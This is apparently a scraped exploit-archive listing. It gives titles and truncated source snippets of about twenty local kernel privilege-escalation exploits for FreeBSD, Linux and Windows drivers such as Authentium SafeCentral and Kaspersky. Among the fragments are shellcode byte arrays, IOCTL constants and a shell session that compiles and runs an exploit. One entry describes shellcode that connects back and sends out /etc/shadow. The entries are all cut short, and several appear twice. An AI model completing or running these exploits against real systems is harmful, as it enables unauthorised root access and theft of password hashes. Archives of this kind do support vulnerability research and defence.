FreeBSD - 'mountnfs()' Denial of Service

/ mountnfsex.c -- Patroklos Argyroudis, argp at domain census-labs.com Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2. Discovered and exploited by Patroklos argp Argyroudis. The vulnerability is in mountnfs which is reachable by the mount2 and nmount2 system calls. In order for them to be...

Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit

No description provided by source. / safecentral-unharden-v2.c Copyright c 2009 by [email protected] Authentium SafeCentral = 2.6 shdrv.sys local kernel ring0 SYSTEM exploit by mu-b - Thu 3 Sep 2009 - Tested on: shdrv.sys 2.0.0.146 Compile: MinGW + -lntdll - Private Source Code -DO NOT DISTRIBU...

Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM

/ safecentral-unharden-v2.c Copyright c 2009 by Authentium SafeCentral include include include define SAFECNTRLIOCTL 0x00226003 static unsigned char win32fixup = "\x53" "\xb8\x00\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\x8b\x00" "\x89\x03" "\x31\xdb" "\x4b" "\x89\x18"; / Win2k3 SP1/2 - kernel EPROCE...

Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM

Exploit for unknown platform in category local exploits ========================================================================= Authentium SafeCentral include include include define SAFECNTRLIOCTL 0x00226003 static unsigned char win32fixup = "\x53" "\xb8\x00\x00\x00\x00" "\xbb\x00\x00\x00\x00"...

Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak

Linux Kernel 2.6.32-rc1 x86-64 - Register Leak / written by Ingo Molnar -- it's true because this comment says the exploit was written by him! / include include unsigned int r81; unsigned int r82; unsigned int r91; unsigned int r92; unsigned int r101; unsigned int r102; unsigned int r111; unsigne...

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]

No description provided by source. This third version features: Complete support for i386, x8664, ppc and ppc64; The personality trick published by Tavis Ormandy and Julien Tinnes; The TOC pointer workaround for data items addressing on ppc64 i.e. functions on exploit code and libc can be...

Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)

Exploit for linux platform in category local exploits ============================================================== Linux Kernel 2.6.19 udpsendmsg Local Root Exploit x86/x64 ============================================================== / second verse, same as the first CVE-2009-2698 udpsendmsg,...

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

No description provided by source. / dedicated to my best friend in the whole world, Robin Price the joke is in your hands just too easy -- some nice library functions for reuse here though credits to julien tinnes/tavis ormandy for the bug may want to remove the attributeregparm3 for 2.4 kernels...

Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day

No description provided by source. / super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But which, thanks to gcc optimizations, becomes exploitable : Also, bypass of mmapminaddr via SELinux vulnerability!...

Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

No description provided by source. / ptraceattach privilege escalation exploit by s0m3b0dy tested on Gentoo 2.6.29rc1 grataz: Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... email: s0m3b0dy1 at gmail.com / include grp.h include stdio.h include fcntl.h include errno.h includ...

FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit

No description provided by source. / bsd-ktimer.c Copyright c 2008 by [email protected] [email protected] FreeBSD = 7.0 local kernel root exploit by christer/mu-b - Mon 2 June 2008 - Tested on: FreeBSD 7.0 FreeBSD 7.1 - Private Source Code -DO NOT DISTRIBUTE - http://www.bsdcitizen.org/ -...

FreeBSD 7.07.1 - ktimer Local Privilege Escalation

FreeBSD 7.07.1 - ktimer Local Privilege Escalation / bsd-ktimer.c Copyright c 2008 by FreeBSD = 7.0 local kernel root exploit by christer/mu-b - Mon 2 June 2008 - Tested on: FreeBSD 7.0 FreeBSD 7.1 - Private Source Code -DO NOT DISTRIBUTE - http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$! / defi...

FreeBSD 7/6x protosw kernel exploit

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 uname -rs FreeBSD 7.0-RELEASE id uid=1001donb gid=1001donb groups=1001donb,0wheel grep ^root /etc/master.passwd grep: /etc/master.passwd: Permission denied nm /boot/kernel/kernel | grep allproc c0bf26b8 B allproc c0bf2670 B allproclock cc -o x x.c ./x...

Linux Kernel &lt; 2.6.22 ftruncate()/open() Local Exploit

No description provided by source. / gw-ftrex.c: Linux kernel 2.6.22 open/ftruncate local exploit by gat3way at gat3way dot eu bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to write into...

Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit

Exploit for linux platform in category local exploits ====================================================== Linux Kernel bug information: http://osvdb.org/49081 !!!This is for educational purposes only!!! To use it, you've got to find a sgid directory you've got permissions to write into obvious...

linux/x86 connect back.send.exit /etc/shadow 155 bytes

No description provided by source. ; CoDed by 0in ; Dark-Coders Group Productions ; Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode ; www.dark-coders.pl ; Contact: 0indotemailatgmaildotcom ; Greetings to:dieAngel,suN8Hclf,m4r1usz,cOndemned ; Compile: ; nasm -f elf shellcode.asm ; ...

Linux Kernel &lt;= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)

No description provided by source. / k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 Discovered and original exploit coded Jan 2005 by sd [email protected] Modified 2005/9 by alert7 [email protected] XFOCUS Security Team http://www.xfocus.org gcc -o k-rad3 k-rad3.c -static -O2 test...

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit

No description provided by source. / dne2000-call.c Copyright c 2008 by [email protected] Deterministic Network Enhancer dne2000.sys local kernel ring0 SYSTEM exploit by mu-b - Sun 06 Jan 2008 - Tested on: dne2000.sys 2.21.7.233 - 3.21.7.17464 bundled with: SafeNET HighAssurance Remote,...

DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM Exploit

Exploit for unknown platform in category local exploits ================================================================== DESlock+ DESlock+ include include include define DLMFENCIOCTL 0x0FA4204C define DLMFENCFLAG 0xC001D00D define DLKFDISKRIOCTL 0x80002008 define DLKFDISKSLOT 0x00000C5C define...

Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow Local Privilege Escalation

Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow Local Privilege Escalation //////////////////////////////////// ///// AVP Kaspersky //////////////////////////////////// //// FOR EDUCATIONAL PURPOSES ONLY //// Kernel Privilege Escalation 2 //// Exploit //// Rubén Santamarta ////...